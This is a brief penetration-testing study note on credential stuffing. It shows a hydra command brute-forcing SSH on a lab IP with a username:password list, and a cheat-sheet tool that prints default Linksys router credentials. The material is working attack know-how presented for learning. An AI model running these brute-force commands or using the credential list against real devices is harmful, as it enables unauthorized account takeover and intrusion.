Another type of brute force in which an attacker uses stolern credentials from one service to attempt access on others (password reuse)
With a list of username:password on hydra:
hydra -C user_pass.list ssh://10.100.38.23
Often seen on routers
Default credentials cheat-sheet:
pip3 install defaultcreds-cheat-sheet
creds search linksys
+---------------+---------------+------------+
| Product | username | password |
+---------------+---------------+------------+
| linksys | <blank> | <blank> |
| linksys | <blank> | admin |
| linksys | <blank> | epicrouter |
| linksys | Administrator | admin |
| linksys | admin | <blank> |
| linksys | admin | admin |
| linksys | comcast | 1234 |
| linksys | root | orion99 |
| linksys | user | tivonpw |
| linksys (ssh) | admin | admin |
| linksys (ssh) | admin | password |
| linksys (ssh) | linksys | <blank> |
| linksys (ssh) | root | admin |
+---------------+---------------+------------+